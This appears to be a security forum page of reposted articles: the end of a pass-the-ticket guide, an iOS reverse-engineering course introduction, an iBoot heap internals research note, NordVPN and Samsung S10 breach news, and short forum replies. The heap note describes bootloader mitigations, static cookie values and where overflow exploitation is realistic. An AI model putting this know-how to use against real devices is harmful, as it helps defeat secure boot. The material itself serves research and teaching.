expires! Conclusion Passing the ticket can be a very effective technique when you do not have access to an NT hash or password. Blue teams are increasingly aware of passing the hash. In response they are placing high value accounts in the Protected Users group or taking other defensive measures. As such, passing the ticket is becoming more and more relevant. Resources https://www.tarlogic.com/en/blog/how-kerberos-works/ https://www.harmj0y.net/blog/tag/kerberos/ Thanks to the following for providing tools or knowledge: Impacket gentilkiwi harmj0y SkelSec knavesec Sursa: https://0xeb-bp.github.io/blog/2019/11/21/practical-guide-pass-the-ticket.html
-
Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link ? All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Version: 1.1 Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources EPUB Download Thanks to natalia-osa's brilliant idea, there's now a .epub version of the course that you can download from here. As Natalia mentioned, this is for easier consumption of the content. Thanks again for this fantastic idea, Natalia ??. License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Donations I don't really accept donations because I do this to share what I learn with the community. If you want to support me just re-share this content and help reach more people. I also have an online store (nullswag.com) with cool clothing thingies if you want to get something there. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
-
iBoot heap internals This research note provides a basic technical outline of the Apple bootchain's heap internals, key algorithms, and security mitigations. This heap implementation is commonly at work at all stages of the boot procedure of iPhones and other Apple devices, and particularly by SecuROM and iBoot. SecuROM (Apple's 1st stage bootloader) and iBoot (the 2nd stage bootloader) are the two most important targets of jailbreaking efforts, as they form the basic tier of the cryptographic verification foundation on which Apple's entire Secure Boot procedure stands. In general, understanding of the bootchain's heap internals is essential to exploitation of heap-based memory corruption vulnerabilities in any of the boot loaders. Aside from jailbreaking, the Apple's bootchain heap makes a perfect specimen for a generalized study of heap implementations, because it's classical, simple and compact, while still maintaining all the commonly recommended security mitigation techniques. General tendencies of heap placement within the device's address space were discussed in my previous researh note: iBoot address space. Overview Apple's bootchain uses a classical heap implementation based on free lists, enhanced with immediate coalescing and security mitigations. It is very simple compared to various well-researched kernel and userland heap implementations, such as the Low Fragmentation Heap in Microsoft Windows, or Linux's glibc. Each stage of the bootchain receives its own heap. In practice there may be 1-2 heaps backing runtime memory requirements of the booting code, depending on the platfrom and the boot stage. Bootchain's heap implementation exposes a standard set of memory management APIs: malloc, calloc, realloc, memalign, free, and memcpy / memset. Initialization Heap is initialized in each stage's system initialization routine, immediately after various bootstrapping tasks are completed, such as code and data relocation. Heap size, number of heaps and their placement are device-specific, submodel-specific and stage-specific, although some general tendencies may be observed. [1] The initialization routine receives a contiguous piece of physical memory which is designated for the heap, and adds it to the largest bin's free-list. Heap roots - initial heap handles and bin pointers from which free lists are walked - are maintained in the data section. Allocations and frees Bootchain's heap allocator is based on the classical first-fit free-list algorithm with 30 bins and immediate coalescing. New heap chunks requested by malloc() are either allocated contiguously from the slab (represented with some larger free chunk than requested), or re-used from the free-list. Only the free-list based allocator is used; there are no dedicated fast-bins or a large-chunk allocator that are commonly found in more advanced heap implementations. On allocation, the free list of the appropriate (by size) bin is iterated, and the first free chunk that accomodates the requested size is assigned to the allocation. Unneeded free space in that chunk is chopped off and returned to the appropriate bin. A freed heap chunk is added at the top of the respective bin. If the adjacent chunk is free, the two chunks are immediately coalesced and moved to the respective bin's free-list. Free-lists and bins Free heap chunks are sorted by size and stored into 30 bins, numbered 2 through 31. Each bin is represented with a global variable in the data section, that holds the topmost item of the free-list for that bin. A free-list is a simple doubly-linked list. Free-list's previous and next pointers are appended to each heap chunk's metadata header upon a free() operation. Free-lists are walked on each allocation request, starting from the top of the bin which is appropriate to the requested size of the allocation. Heap chunk sizes are measured in and rounded to 64-byte units (2^6), including a 64-byte metadata header and reserved space for freelist pointers. For example, given the minimum requested allocation size of 1 byte, in practice will result in 128 bytes being allocated from the heap. Bins sort the chunks by powers of 2. Bins: 30, 2 through 31 0 => 0-63 (2^6-1) - never happens 1 => 64-127 (2^7-1) - never happens 2 => 128-255 byte chunks 3 => 256-511 byte chunks 4 => 512-1023 byte chunks ... etc., up to 31. Note: Bins 0 and 1 exist, but they are never used in practice due to allocation size constraints. Metadata Each heap chunk has a metadata header prepended, which has a size of 64 bytes, both on 32-bit and 64-bit systems. The header contains a 64-bit checksum, followed by a standard set of information fields: size and busy/free status of the current and the previous chunk. Free chunks have an additional 2*size_t metadata block appended to the header, that holds the pointers to the previous and the next free chunk in the bin, used during walking the free-lists. Security mitigations Bootchain's heap implementation employs several well-known security mitigations in order to detect random heap corruptions and harden exploit development for heap-based vulnerabilities. 1. Heap uses a 128-bit random cookie which is stored in the data section. The cookie is used for initial randomization of the heap placement and verification of heap metadata checksums. On older devices (A7 and earlier) SecuROM and LLB use a statically initialized heap cookie: [ 0x64636b783132322f, 0xa7fa3a2e367917fc ]. Note: the cookie is placed at the top of the data section, as the heap is initialized early. It will not be corrupted by a data-to-heap overflow. 2. Initial heap placement may be randomized with 24 bits of entropy, resulting in a random shift of the heap arena by at most 0x3ffc0 bytes against the data section or wherever else it is placed. In LLB and SecuROM the shift is not randomized on older devices (up to and inclusive A7). 3. There is no runtime randomization in the allocation algorithm. All heap chunk addresses returned by malloc() are deterministic with respect to the heap base, as they are popped from the appropriate free-list in FIFO manner. 4. Metadata checksum verification. To prevent heap chunk metadata corruption due to a heap overflow, a chunk's checksum is verified on each heap operation, and will cause an immediate panic if the checksum was corrupted. In addition, an extended heap verification occurs prior to executing the next stage bootloader. The checksum is calculated from the chunk's metadata based on the SipHash algorithm, using the heap cookie as a pseudo-random secret key. Due to the heap cookie being deterministic on A7 and prior SoCs' LLB and SecuROM, the checksum is deterministic and heap overflow attacks are trivial in that particular case. On more recent devices, cross-chunk overflow attacks may still be possible, provided that the vulnerability is pivoted to the shellcode before any heap APIs are called. Since heap usage is not very high in the bootchain, this is realistic. 5. Padding verification. Extra bytes of the chunk beyond the user's requested size are padded with a simple rotating pattern, generated by a function of the user's requested size. This mitigation helps to detect casual heap corruptions, but has near-zero impact on exploit development complexity, since the attacker commonly controls the user's size of the overflowing chunk. 6. Safe unlinking is in place. Free-list pointers are cross-checked against the previous and the next chunk on each free-list operation. A chunk's size is checked against the previous chunk's next_chunk size. 7. Double-frees are detected by verifying the current chunk's free bit in the metadata header. 8. Freed chunks are zeroed. Thus a typical use-after-free vulnerability will manifest itself as a null-pointer dereference upon a random crash. This has no impact on exploit development. 9. All new allocations are zero-initialized. This closes much of the opportunity for memory disclosure attacks via an uninitialized heap variable vulnerability. 10. Zero-sized allocations are not permitted, and will result in a panic. 11. Negatively sized allocations due to an integer underflow/overflow are possible. They are less likely on 64-bit devices, since malloc's size argument would be 64-bit in such case. In summary, these mitigations ensure a basic level of heap protection on recent devices. Exploitation of typical heap corruption vulnerabilities such as data-to-heap and cross-chunk overflows is still possible and realistic in many cases. The strongest mitigations in place are checksum verification and safe unlinking, that would make exploitation of cross-chunk overflows on recent devices non-trivial. This is especially relevant to iBoot, which uses the heap more actively than SecuROM, thus making it more likely that a corrupted heap metadata will be detected before the shellcode had a chance to execute. References 1. "iBoot address space", Alisa Esage http://re.alisa.sh/notes/iBoot-address-space.html 2. iOS Security Guide https://www.apple.com/business/docs/site/iOS_Security_Guide.pdf 3. Memory Management Reference https://www.memorymanagement.org/index.html. Annex A This research note is a teaser into advanced stages of iBootcamp, an online training course on iOS internals and vulnerability research for beginners that I am creating. The only live session of Stage 0 will take place on 12-21 December 2019. You are welcome. ⭐️ Created and published by Alisa Esage Шевченко on 23 November 2019. Last edited: 23 November 2019. Original URL: http://re.alisa.sh/notes/iBoot-heap-internals.html. Author's contacts: e-mail, twitter, github. Sursa: https://re.alisa.sh/notes/iBoot-heap-internals.html
-
Salut, chiar daca le ia de pe un host, cineva poate sa vada de unde le ia si sa le ia singur. Nu exista nicio solutie ca o aplicatie sa se conecteze direct la o baza de date astfel incat cineva rau intentionat sa nu poata face acest lucru. Pentru astfel de lucruri poti face o aplicatie web, un API, pe care aplicatia C# sa o contacteze si sa descrie operatii cu baza de date. De preferat pe baza de autentificare (e.g. un user se logheaza si apoi face diverse lucruri acolo).
-
decrypt ransomware coot
Nytro replied to LucasTony's topic in Reverse engineering & exploit development
Cine se mai abate de la subiect, aduce injurii sau face offtopic - ban direct. -
Cauta o carte, fie o cumperi fie o descarci ca PDF (gasesti cam tot ce vrei) si o citesti. In timp ce citesti si exersezi. Cred ca e cel mai simplu si eficient. Cat despre alta documentatie, ai php.net unde gasesti cam tot ce ai nevoie plus o tona de tutoriale legate de orice. Inclusiv partea de securitate, unde trebuie sa ai grija.
-
Cine nu are bilet sa isi ia azi ca se pare ca de maine se scumpesc.
-
Falsificati si voi niste badge-uri, cat de greu sa fie?
-
Ca hint e un "://" in acel mesaj, deci probabil un URL. Apoi, sunt acele numere cu care se pot face lucruri
-
Salut dacă ma poate ajuta cineva cu doua probleme
Nytro replied to lux0ver's topic in Discutii incepatori
Folosind Azure API creezi masina virtuala cu Windows 10. Poti face tu una care sa contina ce vrei tu instalat si o clonezi cand creezi una noua. Generezi parola random si dai allow portului de RDP din Network Security Group pe resursa (VM-ul) creat. Si userii se conecteaza prin RDP si fac ce ii taie capul acolo. Sunt multe discutii referitoare la crearea de VM-uri pe stackoverflow. -
Salut dacă ma poate ajuta cineva cu doua probleme
Nytro replied to lux0ver's topic in Discutii incepatori
Depinde ce intelegi prin acel remote control. In primul rand, cu sistem de operare o sa aiba masinile virtuale, Linux? Apoi, ce vrei sa le permiti userilor sa faca prin acel remote control? -
Salut dacă ma poate ajuta cineva cu doua probleme
Nytro replied to lux0ver's topic in Discutii incepatori
Daca folosesti masini virtuale in Azure, poti sa folosesti API-ul de la Azure ca sa creezi masini virtuale si nu e dificil. Insa nu stiu cum sta treaca cu costurile. https://docs.microsoft.com/en-us/azure/virtual-machines/linux/create-vm-rest-api -
International Hacking & Information Security Conference 7th-8th NOV 2019 BUY TICKETS Bucharest Romania About DefCamp DefCamp is the most important annual conference on Hacking & Information Security in Central Eastern Europe. Every year brings together the world’s leading cyber security doers to share latest researches and knowledge. Over 2,000 decision makers, security specialists, entrepreneurs, developers, academic, private and public sectors will meet under the same roof in Bucharest, Romania every fall, in November. Worldwide recognized speakers will showcase the naked truth about sensitive topics like infrastructure (in)security, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measurements etc. Yet, the most active part of the conference is Hacking Village , the special designed playground for all hacking activities happening at DefCamp. Site: https://def.camp/
-
Salut dacă ma poate ajuta cineva cu doua probleme
Nytro replied to lux0ver's topic in Discutii incepatori
Salut, daca vrei doar pentru teste si nu ceva profesional (e.g. pe care sa ceri bani) solutia cea mai SIMPLA ar putea fi sa creezi un docker container. Doar ca nu e chiar masina virtuala. Daca vrei sa dai VPS-uri, devine mai complicat. -
NordVPN, a virtual private network provider that promises to “protect your privacy online,” has confirmed it was hacked. The admission comes following rumors that the company had been breached. It first emerged that NordVPN had an expired internal private key exposed, potentially allowing anyone to spin out their own servers imitating NordVPN. VPN providers are increasingly popular as they ostensibly provide privacy from your internet provider and visiting sites about your internet browsing traffic. That’s why journalists and activists often use these services, particularly when they’re working in hostile states. These providers channel all of your internet traffic through one encrypted pipe, making it more difficult for anyone on the internet to see which sites you are visiting or which apps you are using. But often that means displacing your browsing history from your internet provider to your VPN provider. That’s left many providers open to scrutiny, as often it’s not clear if each provider is logging every site a user visits. For its part, NordVPN has claimed a “zero logs” policy. “We don’t track, collect, or share your private data,” the company says. But the breach is likely to cause alarm that hackers may have been in a position to access some user data. NordVPN told TechCrunch that one of its data centers was accessed in March 2018. “One of the data centers in Finland we are renting our servers from was accessed with no authorization,” said NordVPN spokesperson Laura Tyrell. The attacker gained access to the server — which had been active for about a month — by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed. NordVPN did not name the data center provider. “The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either,” said the spokesperson. “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.” According to the spokesperson, the expired private key could not have been used to decrypt the VPN traffic on any other server. NordVPN said it found out about the breach a “few months ago,” but the spokesperson said the breach was not disclosed until today because the company wanted to be “100% sure that each component within our infrastructure is secure.” A senior security researcher we spoke to who reviewed the statement and other evidence of the breach, but asked not to be named as they work for a company that requires authorization to speak to the press, called these findings “troubling.” “While this is unconfirmed and we await further forensic evidence, this is an indication of a full remote compromise of this provider’s systems,” the security researcher said. “That should be deeply concerning to anyone who uses or promotes these particular services.” NordVPN said “no other server on our network has been affected.” But the security researcher warned that NordVPN was ignoring the larger issue of the attacker’s possible access across the network. “Your car was just stolen and taken on a joy ride and you’re quibbling about which buttons were pushed on the radio?” the researcher said. The company confirmed it had installed intrusion detection systems, a popular technology that companies use to detect early breaches, but “no-one could know about an undisclosed remote management system left by the [data center] provider,” said the spokesperson. “They spent millions on ads, but apparently nothing on effective defensive security,” the researcher said. NordVPN was recently recommended by TechRadar and PCMag. CNET described it as its “favorite” VPN provider. It’s also believed several other VPN providers may have been breached around the same time. Similar records posted online — and seen by TechCrunch — suggest that TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. TorGuard also put out an extensive statement following a May blog post, which first revealed the breach. Updated with comment from TorGuard. Sursa: https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/
-
Samsung: Anyone's thumbprint can unlock Galaxy S10 phone Image captionA graphic symbol tells users where they need to press to provide a fingerprint A flaw that means any fingerprint can unlock a Galaxy S10 phone has been acknowledged by Samsung. It promised a software patch that would fix the problem. The issue was spotted by a British woman whose husband was able to unlock her phone with his thumbprint just by adding a cheap screen protector. When the S10 was launched, in March, Samsung described the fingerprint authentication system as "revolutionary". Air gap The scanner sends ultrasounds to detect 3D ridges of fingerprints in order to recognise users. Samsung said it was "aware of the case of S10's malfunctioning fingerprint recognition and will soon issue a software patch". South Korea's online-only KaKao Bank told customers to switch off the fingerprint-recognition option to log in to its services until the issue was fixed. Previous reports suggested some screen protectors were incompatible with Samsung's reader because they left a small air gap that interfered with the scanning. Thumb print The British couple who discovered the security issue told the Sun newspaper it was a "real concern". After buying a £2.70 gel screen protector on eBay, Lisa Neilson registered her right thumbprint and then found her left thumbprint, which was not registered, could also unlock the phone. She then asked her husband to try and both his thumbs also unlocked it. And when the screen protector was added to another relative's phone, the same thing happened. Sursa: https://www.bbc.com/news/technology-50080586
-
Daca inveti C++ o sa iti fie usor pe viitor sa inveti orice alt limbaj.
-
Cand e vorba de astfel de discutii apar si oamenii dornici sa "discute".
-
Butonul din meniu (langa Downloads) e legat de aceasta aplicatie.